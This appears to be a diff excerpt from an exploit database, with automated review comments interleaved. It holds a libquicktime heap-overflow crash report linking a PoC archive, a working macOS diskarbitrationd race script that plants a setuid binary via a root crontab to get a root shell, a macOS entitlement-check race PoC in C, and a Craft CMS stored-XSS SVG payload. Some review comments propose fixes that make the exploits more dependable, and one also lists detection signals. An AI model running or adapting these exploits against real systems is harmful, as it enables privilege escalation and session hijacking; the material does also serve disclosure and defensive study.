#1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633
|
||||
#2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891
|
||||
#3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026
|
||||
#4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075
|
||||
#5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987
|
||||
#6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852
|
||||
#7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
|
||||
#8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)
|
||||
|
||||
|
||||
0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)
|
||||
allocated by thread T0 here:
|
||||
#0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)
|
||||
#1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66
|
||||
|
||||
|
||||
SUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width
|
||||
Shadow bytes around the buggy address:
|
||||
0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
|
||||
0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
|
||||
0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
|
||||
0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa
|
||||
0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04
|
||||
=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00
|
||||
0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd
|
||||
0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa
|
||||
0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Heap right redzone: fb
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack partial redzone: f4
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
ASan internal: fe
|
||||
==10979==ABORTING
|
||||
|
||||
|
||||
POC:
|
||||
libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4
|
||||
CVE:
|
||||
CVE-2017-9128
|
||||
|
||||
|
||||
|
||||
|
||||
=================================
|
||||
|
||||
|
||||
qflb.wu () dbappsecurity com cn
|
||||
|
||||
|
||||
Proofs of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip
|
84
platforms/macos/local/42146.sh
Executable file
84
platforms/macos/local/42146.sh
Executable file
|
@ -0,0 +1,84 @@
|
|||
#!/bin/bash
|
||||
|
||||
# Sources:
|
||||
# https://raw.githubusercontent.com/phoenhex/files/master/pocs/poc-mount.sh
|
||||
# https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc
|
||||
|
||||
if ! security authorize system.volume.internal.mount &>/dev/null; then
|
||||
echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
TARGET=/private/var/at
|
||||
SUBDIR=tabs
|
||||
DISK=/dev/disk0s1
|
||||
|
||||
TMPDIR=/tmp/pwn
|
||||
mkdir -p $TMPDIR
|
||||
cd $TMPDIR
|
||||
|
||||
cat << EOF > boom.c
|
||||
#include <assert.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
int main(int argc, char ** argv) {
|
||||
assert(argc == 2);
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
system(argv[1]);
|
||||
}
|
||||
EOF
|
||||
clang boom.c -o _boom || exit 1
|
||||
|
||||
race_link() {
|
||||
mkdir -p mounts
|
||||
|
||||
while true; do
|
||||
ln -snf mounts link
|
||||
ln -snf $TARGET link
|
||||
done
|
||||
}
|
||||
|
||||
race_mount() {
|
||||
while ! df -h | grep $TARGET >/dev/null; do
|
||||
while df -h | grep $DISK >/dev/null; do
|
||||
diskutil umount $DISK &>/dev/null
|
||||
done
|
||||
while ! df -h | grep $DISK >/dev/null; do
|
||||
diskutil mount -mountPoint $TMPDIR/link/$SUBDIR $DISK &>/dev/null
|
||||
done
|
||||
done
|
||||
}
|
||||
|
||||
cleanup() {
|
||||
echo "Killing child process $PID and cleaning up tmp dir"
|
||||
kill -9 $PID
|
||||
rm -rf $TMPDIR
|
||||
}
|
||||
|
||||
if df -h | grep $DISK >/dev/null; then
|
||||
echo 2>&1 "$DISK already mounted. Exiting."
|
||||
exit 1
|
||||
fi
|
||||
|
||||
race_link &
|
||||
PID=$!
|
||||
trap cleanup EXIT
|
||||
echo "Just imagine having that root shell. It's gonna be legen..."
|
||||
race_mount
|
||||
|
||||
echo "wait for it..."
|
||||
CMD="cp $TMPDIR/_boom $TMPDIR/boom; chmod u+s $TMPDIR/boom"
|
||||
rm -f /var/at/tabs/root
|
||||
echo "* * * * *" "$CMD" > /var/at/tabs/root
|
||||
|
||||
while ! [ -e $TMPDIR/boom ]; do
|
||||
sleep 1
|
||||
done
|
||||
|
||||
echo "dary!"
|
||||
kill -9 $PID
|
||||
sleep 0.1
|
||||
$TMPDIR/boom "rm /var/at/tabs/root"
|
||||
$TMPDIR/boom "umount -f $DISK"
|
||||
$TMPDIR/boom "rm -rf $TMPDIR; cd /; su"
|
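Review bot: `echo 2>&1 "Cannot acquire system.volume.internal.mount right. This will not work."` (and the same form at `echo 2>&1 "$DISK already mounted. Exiting."`) redirects stderr into stdout rather than sending the message to stderr, so both diagnostics still land on stdout; the intended form is `echo >&2 "..."`. `race_mount` has no iteration or time bound, so if the race never succeeds the script spins silently while `race_link` keeps rewriting the symlink in the background; a bounded loop that exits through the existing `cleanup` trap would at least make a failed reproduction visible. From a defender's point of view the observable artifacts of this PoC are a crontab written at /var/at/tabs/root by a non-root user, a setuid binary under /tmp/pwn, and repeated mount/umount of $DISK onto a symlinked mount point, which are the signals a host-based monitor should flag.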
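--- a/platforms/multiple/local/42145.c
+++ b/platforms/multiple/local/42145.c
@@ -0,0 +1,221 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223
+
+One way processes in userspace that offer mach services check whether they should perform an action on
+behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
+
+These decisions are made using the audit token which is appended by the kernel to every received mach message.
+The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
+
+The canonical way which userspace daemons check a message sender's entitlements is as follows:
+
+audit_token_t tok;
+xpc_connection_get_audit_token(conn, &tok);
+SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
+
+CFErrorRef err;
+CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
+
+/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
+
+The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
+to build the SecTaskRef:
+
+SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
+{
+SecTaskRef task;
+
+task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
+...
+
+This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
+
+a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
+This pid now maps to the entitlements of that new binary.
+
+b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
+crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
+The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
+the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
+have its pid reused by the respawned entitled process.
+
+Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
+as they are created.
+
+You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
+constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
+another process or launchd so that you can still engage in a full bi-directional communication with the target service even
+if the audit token was always checked.
+
+The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
+you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
+of whitelisted binaries.
+
+This may also open up access to privileged information which is protected by the entitlements.
+
+This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
+entitlement and pass the check without having that entitlement.
+
+We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
+
+use an lldb invocation like:
+
+sudo lldb -w -n corecaptured
+
+then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
+
+You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
+
+Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
+we could ensure the target service has many messages in its mach port queue to make the race more winnable.
+
+PoC tested on MacOS 10.12.3 (16D32)
+*/
+
+// ianbeer
+#if 0
+MacOS/iOS userspace entitlement checking is racy
+
+One way processes in userspace that offer mach services check whether they should perform an action on
+behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
+
+These decisions are made using the audit token which is appended by the kernel to every received mach message.
+The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
+
+The canonical way which userspace daemons check a message sender's entitlements is as follows:
+
+audit_token_t tok;
+xpc_connection_get_audit_token(conn, &tok);
+SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
+
+CFErrorRef err;
+CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
+
+/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
+
+The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
+to build the SecTaskRef:
+
+SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
+{
+SecTaskRef task;
+
+task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
+...
+
+This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
+
+a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
+This pid now maps to the entitlements of that new binary.
+
+b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
+crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
+The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
+the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
+have its pid reused by the respawned entitled process.
+
+Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
+as they are created.
+
+You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
+constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
+another process or launchd so that you can still engage in a full bi-directional communication with the target service even
+if the audit token was always checked.
+
+The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
+you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
+of whitelisted binaries.
+
+This may also open up access to privileged information which is protected by the entitlements.
+
+This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
+entitlement and pass the check without having that entitlement.
+
+We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
+
+use an lldb invocation like:
+
+sudo lldb -w -n corecaptured
+
+then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
+
+You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
+
+Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
+we could ensure the target service has many messages in its mach port queue to make the race more winnable.
+
+PoC tested on MacOS 10.12.3 (16D32)
+#endif
+
+#include <errno.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+#include <mach/mach.h>
+#include <xpc/xpc.h>
+
+void exec_blocking(char* target, char** argv, char** envp) {
+// create the pipe
+int pipefds[2];
+pipe(pipefds);
+
+int read_end = pipefds[0];
+int write_end = pipefds[1];
+
+// make the pipe nonblocking so we can fill it
+int flags = fcntl(write_end, F_GETFL);
+flags |= O_NONBLOCK;
+fcntl(write_end, F_SETFL, flags);
+
+// fill up the write end
+int ret, count = 0;
+do {
+char ch = ' ';
+ret = write(write_end, &ch, 1);
+count++;
+} while (!(ret == -1 && errno == EAGAIN));
+printf("wrote %d bytes to pipe buffer\n", count-1);
+
+
+// make it blocking again
+flags = fcntl(write_end, F_GETFL);
+flags &= ~O_NONBLOCK;
+fcntl(write_end, F_SETFL, flags);
+
+// set the pipe write end to stdout/stderr
+dup2(write_end, 1);
+dup2(write_end, 2);
+
+execve(target, argv, envp);
+}
+
+xpc_connection_t connect(char* service_name){
+xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
+
+xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
+xpc_type_t t = xpc_get_type(event);
+if (t == XPC_TYPE_ERROR){
+printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
+}
+printf("received an event\n");
+});
+xpc_connection_resume(conn);
+return conn;
+}
+
+int main(int argc, char** argv, char** envp) {
+xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
+xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without entitlements!");
+
+xpc_connection_t conn = connect("com.apple.corecaptured");
+
+xpc_connection_send_message(conn, msg);
+
+// exec a binary with the entitlement to talk to that daemon
+// make sure it doesn't exit by giving it a full pipe for stdout/stderr
+char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool";
+char* target_argv[] = {target_binary, NULL};
+exec_blocking(target_binary, target_argv, envp);
+
+return 0;
+}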
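Review bot: exec_blocking on the new side calls pipe, fcntl with F_GETFL/F_SETFL and O_NONBLOCK, write, dup2 and execve, but the include list only has errno.h, stdio.h, stdlib.h, mach/mach.h and xpc/xpc.h; unless xpc/xpc.h pulls them in transitively, `#include <fcntl.h>` and `#include <unistd.h>` are needed for this to build cleanly. The return values of pipe() and execve() are also ignored, and because stdout and stderr have already been dup2'd onto the deliberately full pipe by the time execve can fail, that failure is silent and main returns 0 looking like success; `if (execve(target, argv, envp) == -1) _exit(111);` at least surfaces it in the exit status. The helper named connect will collide with connect(2) if any header brings in sys/socket.h; renaming it `xpc_connect` avoids that. Note too that xpc_connection_send_message is asynchronous, so the message may not have left the process before execve replaces the image, which is the ordering the PoC depends on; an `xpc_connection_send_barrier` waited on with a semaphore before exec_blocking would make that deterministic instead of relying on the debugger-widened window the header comment describes.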
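--- a/platforms/php/webapps/42143.txt
+++ b/platforms/php/webapps/42143.txt
@@ -0,0 +1,99 @@
+# Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
+# Date: 2017-06-08
+# Exploit Author: Ahsan Tahir
+# Vendor Homepage: https://craftcms.com
+# Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip
+# Version: 2.6
+# Tested on: [Kali Linux 2.0 | Windows 8.1]
+# Email: mrahsan1337@gmail.com
+# Contact: https://twitter.com/AhsanTahirAT
+
+Release Date:
+=============
+2017-06-08
+
+
+Product & Service Introduction:
+===============================
+Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.
+
+
+Abstract Advisory Information:
+==============================
+Ahsan Tahir, an independent security researcher discovered a Persistent Cross-Site Scripting Vulnerability through Unrestricted File Upload of SVG file in Craft CMS (v2.6)
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-06-08: Found the vulnerability.
+2017-06-08: Reported to vendor.
+2017-06-08: Published.
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6.
+Exploitation of the persistent xss web vulnerability requires a limited editor user account with low privileged (only editing news) and only low user interaction.
+
+If attacker upload any file that can use for XSS (HTML, SWF, PHP etc..) it will not accept to uplaod as image. But for images it will stay the same. So if attacker upload SVG with JS content it will work fine and execute JS!
+
+The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work.
+
+Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context.
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation vulnerability can be exploited by a low prviledged user/editor with privileges, only for editing news. After successful exploitation, this attack can be used by editor to hijack admin account!
+
+For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+Payload (Exploitation):
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+<script type="text/javascript">
+alert(document.domain);
+</script>
+</svg>
+
+
+[+] Manual steps to reproduce ..
+1. Login with the editor account (only privilege to edit news) in Craft CMS
+2. Go to 'add news' option: https://localhost/admin/entries/news/new
+3. Put random values in title
+4. In your attacker machine, create a file named 'xss.svg' (without quotes) and inject the payload in the file:
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+<script type="text/javascript">
+alert(document.domain);
+</script>
+</svg>
+4. Upload the xss.svg file in featured image option in Craft CMS
+5. Click on Save
+6. Now go to: https://localhost/s/assets/site/xss.svg
+7. XSS payload execution occurs and alert pop-up with domain name
+
+
+Credits & Authors:
+==================
+Ahsan Tahir - [https://twitter.com/AhsanTahirAT]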